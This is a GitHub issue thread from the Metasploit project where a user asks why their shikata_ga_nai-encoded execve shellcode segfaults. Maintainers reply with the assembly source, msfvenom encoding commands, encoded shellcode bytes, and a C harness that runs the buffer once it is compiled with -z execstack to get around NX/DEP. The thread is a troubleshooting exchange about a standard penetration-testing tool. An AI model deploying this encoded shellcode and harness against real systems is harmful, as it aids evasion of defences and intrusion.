Metasploit-framework: Can I encode my own shellcode ?
Hello sir :)
This is just an experiment, can I encode the shellcode that I created ? for example I use an encoder, e.g shikata_ga_nai for encoding my shellcode
msfvenom -e x86/shikata_ga_nai -i 5 -a x86 --platform linux <shellcode_binary> R | hexdump -v -e '"\\\x" 1/1 "%02x"'
Result after encode :
\xbd\x7f\x94\x6d\xcc\xda\xc5\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x1c\x83\xe8\xfc\x31\x68\x0e\x03\x17\x9a\x8f\x39\x3c\x6b\x96\xb6\xe6\x98\x91\x93\x99\xcf\x81\x80\x56\xd9\xf7\x22\xa9\x9a\xef\xcf\x22\xe0\x13\x93\x04\x84\x4e\xcf\x03\x75\x20\x40\x87\xbc\xf5\x5a\x41\x0d\x36\x75\x32\x7a\xfd\xa2\x79\xec\xe4\xf4\xd8\x67\x9b\xb0\xbe\x4d\xd3\x06\xb0\x9d\x40\x10\x42\x8f\x47\xf5\x55\xa6\xae\xa6\xbe\x80\x47\xd0\x27\x98\xc5\x3d\x77\xd5\x36\xe9\xe4\x92\x64\x97\xb9\x37\xce\x91\x8c\x08\x4c\x7d\xcd\x78\xf7\x50\xe5\xb2\x6d\x4d\xa8\xaf\x76\x4b\x5d\x61\xc3\xbf
Shellcode has been tested but I got Segmentation fault (core dumped) so any Documentation or Solution ?
Thanks
ghost
All 12 comments
I'm not one of the metasploit devs, but you should be able to, I've done it many times before @cskcsk
realoriginal
on 2 Aug 2018
@cskcsk Hi, thank you for reporting, could you please provide your shellcode before encoded?
WangYihang
on 3 Aug 2018
Shellcode :
global _start
section .text
_start:
push byte 11
pop eax
xor edx, edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push edx
push ebx
mov ecx, esp
int 0x80
Not sure why you need an encoder when you don't seem to have badchars to encode for.
wvu-r7
on 5 Aug 2018
Your invocation for msfvenom is wrong, I think. Looks like you're using the old msfpayload syntax.
wvu-r7
on 5 Aug 2018
How are you using the encoded shellcode?
wvu-r7
on 5 Aug 2018
I have no problem with generating an ELF from your shellcode and shikata_ga_nai. If you're hitting a segfault while using a shellcode harness, maybe you're hitting NX/DEP. Try compiling with -z execstack.
wvu-r7
on 5 Aug 2018
wvu@hiigara:~/metasploit-framework:master$ cat > shellcode.asm
global _start
section .text
_start:
push byte 11
pop eax
xor edx, edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push edx
push ebx
mov ecx, esp
int 0x80
wvu@hiigara:~/metasploit-framework:master$ nasm -f elf shellcode.asm
wvu@hiigara:~/metasploit-framework:master$ ld shellcode.o -o shellcode -m elf_i386
wvu@hiigara:~/metasploit-framework:master$ ./shellcode
$
wvu@hiigara:~/metasploit-framework:master$
wvu@hiigara:~/metasploit-framework:master$ objcopy --dump-section .text=shellcode.bin shellcode
wvu@hiigara:~/metasploit-framework:master$ rm shellcode
wvu@hiigara:~/metasploit-framework:master$ ./msfvenom -a x86 --platform linux -e x86/shikata_ga_nai -i 5 -f elf -o shellcode < shellcode.bin
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 51 (iteration=0)
x86/shikata_ga_nai succeeded with size 78 (iteration=1)
x86/shikata_ga_nai succeeded with size 105 (iteration=2)
x86/shikata_ga_nai succeeded with size 132 (iteration=3)
x86/shikata_ga_nai succeeded with size 159 (iteration=4)
x86/shikata_ga_nai chosen with final size 159
Payload size: 159 bytes
Final size of elf file: 243 bytes
Saved as: shellcode
wvu@hiigara:~/metasploit-framework:master$ chmod +x shellcode
wvu@hiigara:~/metasploit-framework:master$ ./shellcode
$
wvu@hiigara:~/metasploit-framework:master$
Yeah, check your harness or exploit. Bypass any mitigations. Let me know if I should reopen this.
wvu-r7
on 5 Aug 2018
9663
wvu-r7
on 5 Aug 2018
I guess I already answered this before.
wvu-r7
on 5 Aug 2018
wvu@hiigara:~/metasploit-framework:master$ ./msfvenom -a x86 --platform linux -e x86/shikata_ga_nai -i 5 -f c < shellcode.bin >> harness.c
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 51 (iteration=0)
x86/shikata_ga_nai succeeded with size 78 (iteration=1)
x86/shikata_ga_nai succeeded with size 105 (iteration=2)
x86/shikata_ga_nai succeeded with size 132 (iteration=3)
x86/shikata_ga_nai succeeded with size 159 (iteration=4)
x86/shikata_ga_nai chosen with final size 159
Payload size: 159 bytes
Final size of c file: 693 bytes
wvu@hiigara:~/metasploit-framework:master$ vi harness.c
wvu@hiigara:~/metasploit-framework:master$ cat harness.c
#include <stdio.h>
#include <string.h>
int main(void)
{
char buf[] =
"\xdb\xc9\xd9\x74\x24\xf4\x5b\xb8\xbe\xc2\x11\xfa\x2b\xc9\xb1"
"\x22\x83\xeb\xfc\x31\x43\x13\x03\xfd\xd1\xf3\x0f\xdb\x13\x2a"
"\x9b\xff\x6f\x76\x1d\x27\x64\x27\x86\xfe\xb2\x89\x2c\x83\xad"
"\x16\x63\xdb\x39\xe4\xdc\xb6\x7b\xf4\xca\xab\x1f\xc1\x61\x0a"
"\xad\x02\xac\xbd\xab\x1e\x57\x0d\x63\x30\x62\xe8\x87\x6b\x99"
"\xff\xb9\x10\xbd\x7e\xd9\x92\xdc\xde\x40\x2a\xc3\x94\x06\x31"
"\x42\xe2\xb3\x15\x97\x21\x37\x5a\x5c\x6a\xe4\x8e\x56\xb6\x74"
"\x0c\x1c\x41\xd0\x76\xbe\xb1\x61\x27\x6f\x10\x0b\x09\x61\x32"
"\xef\x0e\xf4\x98\xae\xb0\xef\x6a\x9f\x13\x74\xa2\x70\x0c\x2a"
"\x62\x0a\xec\x16\x9a\xdc\x1b\x7a\x1b\xfc\xa4\x5d\x5c\xe9\x74"
"\x4f\x7b\xa9\x67\x4e\xd8\xa3\x2e\xc3";
printf("Shellcode Length: %d\n", strlen(buf));
int (*ret)() = (int(*)())buf;
return ret();
}
wvu@hiigara:~/metasploit-framework:master$ gcc harness.c -o harness -m32
wvu@hiigara:~/metasploit-framework:master$ ./harness
Shellcode Length: 159
Segmentation fault
wvu@hiigara:~/metasploit-framework:master$ gcc harness.c -o harness -m32 -z execstack
wvu@hiigara:~/metasploit-framework:master$ ./harness
Shellcode Length: 159
$
wvu@hiigara:~/metasploit-framework:master$
Related issues
BaconBombz
路
3Comments
Acidical
路
3Comments
bugshere
路
3Comments
verapex
路
3Comments
felipee07
路
3Comments
Most helpful comment